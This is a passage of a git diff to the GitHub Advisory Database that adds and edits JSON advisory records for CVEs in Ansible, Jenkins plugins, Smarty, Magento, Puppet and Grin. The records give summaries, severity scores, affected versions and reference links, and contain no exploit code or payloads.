b/advisories/github-reviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json new file mode 100644 index 0000000000000..dd1a3cfd3a1ae --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64cw-m57j-65xj", + "modified": "2024-01-30T23:55:58Z", + "published": "2022-05-17T19:57:30Z", + "aliases": [ + "CVE-2014-4967" + ], + "summary": "Ansible Arbitrary Code Execution", + "details": "Multiple argument injection vulnerabilities in Ansible before 1.6.7 allow remote attackers to execute arbitrary code by leveraging access to an Ansible managed host and providing a crafted fact, as demonstrated by a fact with (1) a trailing \" src=\" clause, (2) a trailing \" temp=\" clause, or (3) a trailing \" validate=\" clause accompanied by a shell command.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4967" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" + }, + { + "type": "WEB", + "url": "http://www.ocert.org/advisories/ocert-2014-004.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:55:58Z", + "nvd_published_at": "2020-02-18T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json b/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json index e19ed2bd3b8cc..d02d3f9a1e89b 100644 --- a/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json +++ b/advisories/github-reviewed/2022/05/GHSA-653q-vqm6-gmjm/GHSA-653q-vqm6-gmjm.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8090" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8090.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json b/advisories/github-reviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json new file mode 100644 index 0000000000000..5dc80521b27a9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65cq-whr4-7c2v", + "modified": "2024-01-30T22:33:48Z", + "published": "2022-05-17T00:32:26Z", + "aliases": [ + "CVE-2017-1000109" + ], + "summary": "Persistent XSS vulnerability in Jenkins OWASP Dependency-Check Plugin", + "details": "The custom Details view of the Static Analysis Utilities based OWASP Dependency-Check Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:dependency-check-jenkins-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.1.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.1.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000109" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/100227" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:33:48Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json b/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json index 7a4d45f56a126..d95fe8e5a0d91 100644 --- a/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json +++ b/advisories/github-reviewed/2022/05/GHSA-65j5-vpm7-6xp4/GHSA-65j5-vpm7-6xp4.json @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "3.1.33-dev-4" + "fixed": "3.1.33" } ] } @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2018-16831.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json b/advisories/github-reviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json new file mode 100644 index 0000000000000..51b7948518cb7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65rj-cgrp-g65w", + "modified": "2024-01-30T21:20:03Z", + "published": "2022-05-24T16:55:01Z", + "aliases": [ + "CVE-2019-10391" + ], + "summary": "Jenkins IBM AppScan Plugin showed plain text password in job configuration form fields ", + "details": "Jenkins IBM Application Security on Cloud Plugin 1.2.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure. This plugin has bee deprecated.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.hcl.security:ibm-application-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.2.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10391" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-28/#SECURITY-1512" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/28/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:20:03Z", + "nvd_published_at": "2019-08-28T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json b/advisories/github-reviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json new file mode 100644 index 0000000000000..b6a3058e0e506 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6667-f46p-pg88", + "modified": "2024-01-31T00:03:35Z", + "published": "2022-05-17T19:57:32Z", + "aliases": [ + "CVE-2014-4659" + ], + "summary": "Ansible sets unsafe permissions for sources.list", + "details": "Ansible before 1.5.5 sets 0644 permissions for `sources.list`, which might allow local users to obtain sensitive credential information in opportunistic circumstances by reading a file that uses the `"deb http://user:pass@server:port/"` format.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4659" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/a0e027fe362fbc209dbeff2f72d6e95f39885c69" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/blob/release1.5.5/CHANGELOG.md" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229060001/https://www.securityfocus.com/bid/68234" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:03:35Z", + "nvd_published_at": "2020-02-20T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json b/advisories/github-reviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json new file mode 100644 index 0000000000000..a86ce0ba5b5c9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-687x-269m-7cv9", + "modified": "2024-01-30T22:36:26Z", + "published": "2022-05-14T03:46:09Z", + "aliases": [ + "CVE-2018-1000008" + ], + "summary": "XXE vulnerability in Jenkins PMD Plugin", + "details": "Jenkins PMD Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:pmd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.50" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.49" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000008" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/102844" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:26Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json b/advisories/github-reviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json new file mode 100644 index 0000000000000..783d5aab96e83 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h72-m3xw-fp3c", + "modified": "2024-01-30T22:44:21Z", + "published": "2022-05-13T01:40:56Z", + "aliases": [ + "CVE-2017-1000104" + ], + "summary": "Improper Privilege Management in Jenkins Config File Provider Plugin", + "details": "The Config File Provider Plugin is used to centrally manage configuration files that often include secrets, such as passwords. Users with only Overall/Read access to Jenkins were able to access URLs directly that allowed viewing these files. Access to view these files now requires sufficient permissions to configure the provided files, view the configuration of the folder in which the configuration files are defined, or have Job/Configure permissions to a job able to use these files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:config-file-provider" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.16.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.16.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000104" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:44:21Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json b/advisories/github-reviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json new file mode 100644 index 0000000000000..19ae5f17415bb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6j5j-w6v4-rwqr", + "modified": "2024-01-30T21:43:14Z", + "published": "2022-05-13T01:25:43Z", + "aliases": [ + "CVE-2019-1003078" + ], + "summary": "Jenkins VMware Lab Manager Slaves Plugin vulnerable CSRF vulnerability", + "details": "A cross-site request forgery vulnerability in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:labmanager" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003078" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:43:14Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json b/advisories/github-reviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json new file mode 100644 index 0000000000000..e2a1f92fa4806 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m9f-8vwq-97pm", + "modified": "2024-02-08T22:08:36Z", + "published": "2022-05-02T04:00:47Z", + "aliases": [ + "CVE-2009-5054" + ], + "summary": "Smarty Does Not Consider Umask Values When Setting Permissions", + "details": "Smarty before 3.0.0 beta 4 does not consider the umask value when setting the permissions of files, which might allow attackers to bypass intended access restrictions via standard filesystem operations.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "smarty/smarty" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.0-beta4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-5054" + }, + { + "type": "PACKAGE", + "url": "https://github.com/smarty-php/smarty" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101116174040/http://smarty-php.googlecode.com/svn/trunk/distribution/change_log.txt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:08:36Z", + "nvd_published_at": "2011-02-03T17:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json b/advisories/github-reviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json new file mode 100644 index 0000000000000..99d34c318bfeb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mgq-vh7r-gccc", + "modified": "2024-01-30T21:41:28Z", + "published": "2022-05-13T01:25:42Z", + "aliases": [ + "CVE-2019-1003086" + ], + "summary": "CSRF vulnerability in Jenkins sinatra-chef-builder Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sinatra-chef-builder" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003086" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:41:28Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json b/advisories/github-reviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json new file mode 100644 index 0000000000000..f2132fd6c3795 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pj9-5q6j-j97c", + "modified": "2024-01-30T21:50:39Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003083" + ], + "summary": "Missing permission check in Jenkins Gearman Plugin", + "details": "A missing permission check in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:gearman-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003083" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:50:39Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json b/advisories/github-reviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json new file mode 100644 index 0000000000000..d6a0d95360bfc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6q4p-jrjv-44gf", + "modified": "2024-01-30T23:18:52Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10386" + ], + "summary": "Cross-site request forgery vulnerability in Jenkins XL TestView Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xebialabs.xlt.ci:xltestview-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10386" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:18:52Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json b/advisories/github-reviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json new file mode 100644 index 0000000000000..7f6e28fd27f06 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6x52-88cq-55q5", + "modified": "2024-02-01T21:47:46Z", + "published": "2022-05-24T17:17:13Z", + "aliases": [ + "CVE-2020-12439" + ], + "summary": "Grin allows attackers to adversely affect availability of data on a Mimblewimble blockchain", + "details": "Grin before 3.1.0 allows attackers to adversely affect availability of data on a Mimblewimble blockchain.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "grin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12439" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/issues/3235" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/pull/3236" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-12439.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:46Z", + "nvd_published_at": "2020-05-05T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json b/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json index fe6d12c1bed28..b96860f86f446 100644 --- a/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json +++ b/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json @@ -68,10 +68,6 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74796" }, - { - "type": "ADVISORY", - "url": "https://github.com/advisories/GHSA-6xxq-j39w-g3f6" - }, { "type": "PACKAGE", "url": "https://github.com/puppetlabs/puppet" @@ -104,6 +100,26 @@ "type": "WEB", "url": "https://web.archive.org/web/20121013181707/http://puppetlabs.com/security/cve/cve-2012-1988/" }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121025112409/http://secunia.com/advisories/48789" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121025113446/http://secunia.com/advisories/48748" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121025194830/http://secunia.com/advisories/49136" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121025194938/http://secunia.com/advisories/48743" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121031092646/http://www.securityfocus.com/bid/52975" + }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079227.html" @@ -116,6 +132,18 @@ "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080003.html" }, + { + "type": "WEB", + "url": "http://projects.puppetlabs.com/issues/13518" + }, + { + "type": "WEB", + "url": "http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.15" + }, + { + "type": "WEB", + "url": "http://puppetlabs.com/security/cve/cve-2012-1988/" + }, { "type": "WEB", "url": "http://ubuntu.com/usn/usn-1419-1" @@ -127,7 +155,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json b/advisories/github-reviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json new file mode 100644 index 0000000000000..a8372d2500367 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-745w-v492-4fj5", + "modified": "2024-01-30T21:24:33Z", + "published": "2022-05-24T16:50:04Z", + "aliases": [ + "CVE-2019-10342" + ], + "summary": "Missing permission check in Jenkins Docker Plugin", + "details": "A missing permission check in Jenkins Docker Plugin 1.1.6 and earlier in various 'fillCredentialsIdItems' methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.docker:docker-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.6" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10342" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1400" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/07/11/4" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/109156" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:24:33Z", + "nvd_published_at": "2019-07-11T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json b/advisories/github-reviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json similarity index 75% rename from advisories/unreviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json rename to advisories/github-reviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json index 00305c6573b90..a6f0f1c2c9415 100644 --- a/advisories/unreviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json +++ b/advisories/github-reviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-746x-xxrx-23jp", - "modified": "2022-05-13T01:15:02Z", + "modified": "2024-01-30T21:51:21Z", "published": "2022-05-13T01:15:02Z", "aliases": [ "CVE-2019-10294" ], + "summary": "Jenkins Kmap Plugin stores credentials in plain text ", "details": "Jenkins Kmap 